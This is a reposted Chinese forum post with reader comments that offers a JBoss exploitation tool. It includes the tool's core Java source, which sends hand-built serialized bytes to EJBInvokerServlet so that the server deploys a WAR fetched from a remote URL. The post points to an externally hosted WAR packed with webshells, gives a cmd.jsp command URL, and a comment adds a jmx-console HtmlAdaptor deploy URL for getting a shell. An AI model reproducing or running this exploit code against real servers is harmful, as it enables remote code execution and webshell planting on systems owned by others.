Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具

admin 2021年4月2日19:52:50评论150 views字数 9694阅读32分18秒阅读模式

昨天花了一点时间去看以前的Jboss漏洞,选了俩比较实用的写了个小工具。

第一个漏洞主要是写去年十月份的那个deploy有点小问题:Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE 不知为何我写出来的字节数组始终比作者发出来的少了那么几个。

后来自己索性自己拼凑了一个跟php一样的(对Jboss4有效)。

第二个漏洞是jmx HtmlAdaptor,测试环境jboss-6.1.0.Final、jboss-6.0.0.Final。

下载地址:

Jboss漏洞利用工具.jar

功能说明:

安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。

1、JMX/EJBInvokerServlet:

host写IP或域名:127.0.0.1/p2j.cn

port必填,如:8080

2、HtmlAdaptor:

host写URL地址:http://localhost:8080

port不需填写

3、war包推荐使用:http://p2j.cn/is.war,is.war里面带有几个版本的一句话和一个cmd.jsp

(如:http://xxx.com/is/?cmd.jsp?pwd=023&cmd=ls)如果使用自己的war包,

cmd功能需要默认配置(/is/cmd.jsp)war包只自带了mysql数据库所需要的jar,

连接oracle等其他数据库需要自己添加jar包

FROM:p2j.cn

截图-JMX/EJBInvokerServlet:

截图-HtmlAdaptor:

核心源码:

package org.javaweb.jboss;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetSocketAddress;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.util.ArrayList;
import java.util.List;

public class Test {

  byte[] a1 = new byte[]{
    (byte) 0xac,(byte) 0xed,0x00,0x05,0x73,0x72,0x00,0x29,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73,                 // ....sr.) org.jbos
     0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,0x61,0x72,                       // s.invoca tion.Mar
     0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,                      // shalledI nvocatio
     0x6e,(byte) 0xf6,0x06,(byte) 0x95,0x27,0x41,0x3e,(byte) 0xa4,(byte) 0xbe,0x0c,0x00,0x00,0x78,0x70,0x70,0x77,        // n...'A>. ....xppw
     0x08,0x78,(byte) 0x94,(byte) 0x98,0x47,(byte) 0xc1,(byte) 0xd0,0x53,(byte) 0x87,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,      // .x..G..S .sr..jav
     0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,0x72,0x12,(byte) 0xe2,                    // a.lang.I nteger..
     (byte) 0xa0,(byte) 0xa4,(byte) 0xf7,(byte) 0x81,(byte) 0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,0x61,0x6c,0x75,      // .....8.. .I..valu
     0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4e,                      // exr..jav a.lang.N
     0x75,0x6d,0x62,0x65,0x72,(byte) 0x86,(byte) 0xac,(byte) 0x95,0x1d,0x0b,(byte) 0x94,(byte) 0xe0,(byte) 0x8b,0x02,0x00,0x00,  // umber... ........
     0x78,0x70,0x26,(byte) 0x95,(byte) 0xbe,0x0a,0x73,0x72,0x00,0x24,0x6f,0x72,0x67,0x2e,0x6a,0x62,                // xp&...sr .$org.jb
     0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x4d,                      // oss.invo cation.M
     0x61,0x72,0x73,0x68,0x61,0x6c,0x6c,0x65,0x64,0x56,0x61,0x6c,0x75,0x65,(byte) 0xea,(byte) 0xcc,                // arshalle dValue..
     (byte) 0xe0,(byte) 0xd1,(byte) 0xf4,0x4a,(byte) 0xd0,(byte) 0x99,0x0c,0x00,0x00,0x78,0x70,0x77
   };

  byte[] aa = new byte[]{(byte) 0xeb,0x0,0x0,0x0,(byte) 0xe3};
  byte[] ab = new byte[]{0x0,0x15};

  byte[] a2 = new byte[]{
    (byte) 0xac,(byte) 0xed,0x00,0x05,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,                  // .....ur. .[Ljava.
     0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,(byte) 0x90,(byte) 0xce,0x58,(byte) 0x9f,            // lang.Obj ect;..X.
     0x10,0x73,0x29,0x6c,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x04,0x73,0x72,0x00,                      // .s)l...x p....sr.
     0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e,                      // .javax.m anagemen
     0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,(byte) 0xa7,0x1b,                    // t.Object Name....
     (byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,0x6f,0x73,                // .m.....x pt.!jbos
     0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,0x63,0x65,                      // s.system :service
     0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,0x74,0x00,                      // =MainDep loyerxt.
     0x06,0x64,0x65,0x70,0x6c,0x6f,0x79,0x75,0x71,0x00,0x7e,0x00,0x00,0x00,0x00,0x00,                      // .deployu q.~.....
     0x01,0x74
  };

  byte[] a3 = new byte[]{
    0x75,0x72,0x00,
    0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,                                      // ur..[ Ljava.la
     0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,(byte) 0xad,(byte) 0xd2,0x56,(byte) 0xe7,(byte) 0xe9,0x1d,        // ng.Strin g;..V...
     0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00,0x10,0x6a,0x61,                      // {G...xp. ...t..ja
     0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67
  };

  byte[] a4 = new byte[]{
    0x0d,(byte) 0xd3,
    (byte) 0xbe,(byte) 0xc9,0x78,0x77,0x04,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x22,0x6f,0x72,0x67,                // ..xw.... .sr."org
     0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,                      // .jboss.i nvocatio
     0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x4b,0x65,0x79,(byte) 0xb8,                    // n.Invoca tionKey.
     (byte) 0xfb,0x72,(byte) 0x84,(byte) 0xd7,(byte) 0x93,(byte) 0x85,(byte) 0xf9,0x02,0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,  // .r...... ..I..ord
     0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,0x00,0x05,0x73,0x71,0x00,0x7e,0x00,0x05,                      // inalxp.. ..sq.~..
     0x77,0x0d,0x00,0x00,0x00,0x05,(byte) 0xac,(byte) 0xed,0x00,0x05,0x70,(byte) 0xfb,0x57,(byte) 0xa7,(byte) 0xaa,0x78,      // w....... ..p.W..x
     0x77,0x04,0x00,0x00,0x00,0x03,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x04,                      // w.....sq .~......
     0x73,0x72,0x00,0x23,0x6f,0x72,0x67,0x2e,0x6a,0x62,0x6f,0x73,0x73,0x2e,0x69,0x6e,                      // sr.#org. jboss.in
     0x76,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,                      // vocation .Invocat
     0x69,0x6f,0x6e,0x54,0x79,0x70,0x65,0x59,(byte) 0xa7,0x3a,0x1c,(byte) 0xa5,0x2b,0x7c,(byte) 0xbf,0x02,            // ionTypeY .:..+|..
     0x00,0x01,0x49,0x00,0x07,0x6f,0x72,0x64,0x69,0x6e,0x61,0x6c,0x78,0x70,0x00,0x00,                      // ..I..ord inalxp..
     0x00,0x01,0x73,0x71,0x00,0x7e,0x00,0x07,0x00,0x00,0x00,0x0a,0x70,0x74,0x00,0x0f,                      // ..sq.~.. ....pt..
     0x4a,0x4d,0x58,0x5f,0x4f,0x42,0x4a,0x45,0x43,0x54,0x5f,0x4e,0x41,0x4d,0x45,0x73,                      // JMX_OBJE CT_NAMEs
     0x72,0x00,0x1b,0x6a,0x61,0x76,0x61,0x78,0x2e,0x6d,0x61,0x6e,0x61,0x67,0x65,0x6d,                      // r..javax .managem
     0x65,0x6e,0x74,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x4e,0x61,0x6d,0x65,0x0f,0x03,                      // ent.Obje ctName..
     (byte) 0xa7,0x1b,(byte) 0xeb,0x6d,0x15,(byte) 0xcf,0x03,0x00,0x00,0x78,0x70,0x74,0x00,0x21,0x6a,0x62,            // ...m.... .xpt.!jb
     0x6f,0x73,0x73,0x2e,0x73,0x79,0x73,0x74,0x65,0x6d,0x3a,0x73,0x65,0x72,0x76,0x69,                      // oss.syst em:servi
     0x63,0x65,0x3d,0x4d,0x61,0x69,0x6e,0x44,0x65,0x70,0x6c,0x6f,0x79,0x65,0x72,0x78,                      // ce=MainD eployerx
     0x78
  };

  public void send(String host,int port,byte[] requestData) throws Exception {
    try {
      SocketChannel socketChannel = SocketChannel.open();
      socketChannel.socket().connect(new InetSocketAddress(host,port),5000);
      socketChannel.configureBlocking(false);
      ByteBuffer byteBuffer = ByteBuffer.allocate(512);
      socketChannel.write(ByteBuffer.wrap(requestData));
      while (true) {
        byteBuffer.clear();
        int readBytes = socketChannel.read(byteBuffer);
        if (readBytes > 0) {
          byteBuffer.flip();
          socketChannel.close();
          break;
        }
      }

    } catch (IOException e) {
      throw e;
    }
  }

  protected void addByte(List ls,byte[] b){
    for(byte bb:b){
      ls.add(bb);
    }
  }

  protected byte[] toByteArray(Byte[] b){
    ByteArrayOutputStream bos = new ByteArrayOutputStream();
    for(byte bs:b){
      bos.write(bs);
    }
    return bos.toByteArray();
  }

  public String request(String url) throws Exception{
      String str = "",tmp;
      BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
     while((tmp=br.readLine())!=null){
      str+=tmp+"rn";
    }
    return str;
  }

  public void testEJBInvokerServlet(String host,int port,String war) throws Exception{
     List ls = new ArrayList();
    addByte(ls, a1);
    addByte(ls,aa);
    addByte(ls, a2);
    addByte(ls, ab);
    addByte(ls, war.getBytes());
    addByte(ls, a3);
    addByte(ls, a4);
    byte[] b = toByteArray(ls.toArray(new Byte[ls.size()]));
    String req = "POST /invoker/EJBInvokerServlet/ HTTP/1.1rn"+
        "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocationrn"+
         "Accept-Encoding: x-gzip,x-deflate,gzip,deflatern"+
        "User-Agent: Java/1.6.0_21rn"+
        "Host: "+host+":"+port+"rn"+
        "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2rn"+
        "Connection: keep-alivern"+
        "Content-type: application/x-www-form-urlencodedrn"+
        "Content-Length: "+b.length+"rnrn";
    ls.clear();
    addByte(ls, req.getBytes());
    addByte(ls, b);
    send(host,port,toByteArray(ls.toArray(new Byte[ls.size()])));
  }

}

[原文地址]

各种吐槽:

1#

包包 | 2014-03-05 15:24

看不懂。。

2#

luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2014-03-05 15:24

32个赞

3#

啦绯哥 | 2014-03-05 15:26

要闪电才行

4#

瘦蛟舞 | 2014-03-05 15:27

支持https么?

5#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-03-05 15:34

@瘦蛟舞 HtmlAdaptor的那个直接写https就行了,JMX/EJBInvokerServlet那个走的是socket连接,只需要连接端口。cmd执行的第一个的url是拼的http第二个直接取的host。

6#

clzzy (南无阿弥陀佛) | 2014-03-05 15:34

支持FTPS么?

7#

瘦蛟舞 | 2014-03-05 15:37

@北京方便面 @Finger @贱心 @梧桐雨

8#

x1aoh4i | 2014-03-05 15:56

/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service%3DMainDeployer&methodIndex=17&arg0=

9#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-03-05 16:02

@x1aoh4i 你发的是这个:JBoss Jmx GetShell

10#

爱上平顶山 (爱上平顶山) | 2014-03-05 16:21

威武。。。。。。。

11#

Xeyes (无个性,不签名.) | 2014-03-05 16:30

thx ~

12#

wefgod (求大牛指点) | 2014-03-05 16:40

@x1aoh4i 你发的这个是jmx的,和园长发的不是一个。现在jmx很多都见不到了,园长的这种比较实用

13#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-03-05 16:51

@wefgod 我猜他是直接从我的代码里面拷出来的。

14#

eval | 2014-03-05 16:55

@园长 膜拜园长大人

15#

insight-labs (Root Yourself in Success) | 2014-03-05 17:04

膜拜

16#

x1aoh4i | 2014-03-05 21:55

@园长 @wefgod 嘿嘿嘿嘿 哈哈哈哈 你以为呢

17#

核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-03-06 10:25

mark...

18#

Ivan (Null.) | 2014-03-06 10:45

mark.

19#

j2ck3r (别关注我,跟你不熟。) | 2014-03-06 18:12

怎么运行?

20#

北京方便面 | 2014-03-10 18:29

@瘦蛟舞 园长就不感谢了

21#

j2ck3r (别关注我,跟你不熟。) | 2014-03-10 19:01

@园长 我运行老是出错。。什么原因 求解

22#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-03-10 20:35

@j2ck3r 你的版本比我编译的版本低了。

23#

j2ck3r (别关注我,跟你不熟。) | 2014-03-10 21:07

@园长 明白了。

24#

j2ck3r (别关注我,跟你不熟。) | 2014-03-10 21:23

@园长 获取成功之后,执行不了命令 怎么回事

25#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-03-10 21:46

@j2ck3r 可能是失败了吧。成功的话whoami试下,我执行命令那里忘了写个编码了。空格需要自己手动换成%20.

26#

Black Angel | 2014-03-10 23:15

看不懂JAVA 看来PHP学完后要攻克一下JAVA了

27#

Zvall (电击小子) | 2014-03-10 23:34

mark...

28#

园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-03-10 23:50

@Zvall 好久不见。

29#

j2ck3r (别关注我,跟你不熟。) | 2014-03-10 23:54

@园长 获取成功 但是执行命令失败了 就是说那个WAR的包没有传上去

30#

随时回来 (我们做一些很酷的事,去改变世界) | 2014-03-11 14:25

下载量 这么高 楼主牛X

31#

Sura、Rain | 2014-03-21 22:44

@园长 为什么换我的war包 不能 获取呢?

32#

Spy4man (公共号,言论不代表ID本人!) | 2014-04-24 13:01

metasploit里面search jboss,可以挂各种paylload,成功率很高.

33#

美丽的小菊花 | 2014-04-24 13:11

@Spy4man 惊现大黑客,膜拜一下。。。

34#

oldsun (我蛋疼) | 2014-07-17 20:03

@园长 求is.war

35#

园长 (bluereader.org) | 2014-07-17 21:01

@oldsun http://www.ahack.net/is.war

文章来源于lcx.cc:Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具

相关推荐: 如何让100个请求同时发生

如何让100个请求同时发生 xsser (十根阳具有长短!!) | 2013-11-29 23:35 严格意义上的同时 有什么办法么 [原文地址] 相关讨论: 1# neal | 2013-11-29 23:36 开一百台电脑 这么简单的问题还问 2# 无敌L…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日19:52:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具https://cn-sec.com/archives/316845.html

发表评论

匿名网友 填写信息